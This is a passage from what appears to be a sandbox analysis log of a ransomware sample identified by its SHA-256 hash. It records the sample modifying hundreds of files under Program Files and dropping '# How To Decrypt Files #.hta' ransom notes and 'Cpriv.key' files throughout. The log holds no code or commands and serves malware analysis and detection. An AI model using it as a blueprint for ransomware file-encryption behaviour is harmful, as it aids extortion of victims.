Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-disable.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Green Bubbles.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Start End Dates.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mscss7wre_fr.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\PublicFunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00438_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\DESKSAM.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18253_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\th\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05710_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR34B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15185_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\REFINED\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OSPP.VBS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03459_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00159_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\AddInViews\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\row_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\AccessWeb\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18236_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\Client.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00330_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\af\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\Accessories\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18241_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Library\EUROTOOL.XLAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Shared Gadgets\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE06450_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00178_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\br\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NBOOK_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR12F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00268_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.IN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Word.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Configuration\Registration\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\Timeline.cpu.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\XLCPRTID.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\TableTextService\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Access.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSSKETLG.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14845_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Horizon.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\COUPON.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\IPML.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143749.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\flyout_background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\LogoCanary.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Module.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324694.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01141_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21309_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\GREETING.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPWMI.MOF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\1033\OFFICE10.MML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00372_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\BlackTieMergeLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\DESIGNER.ONE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\adovbs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR7B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR40F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 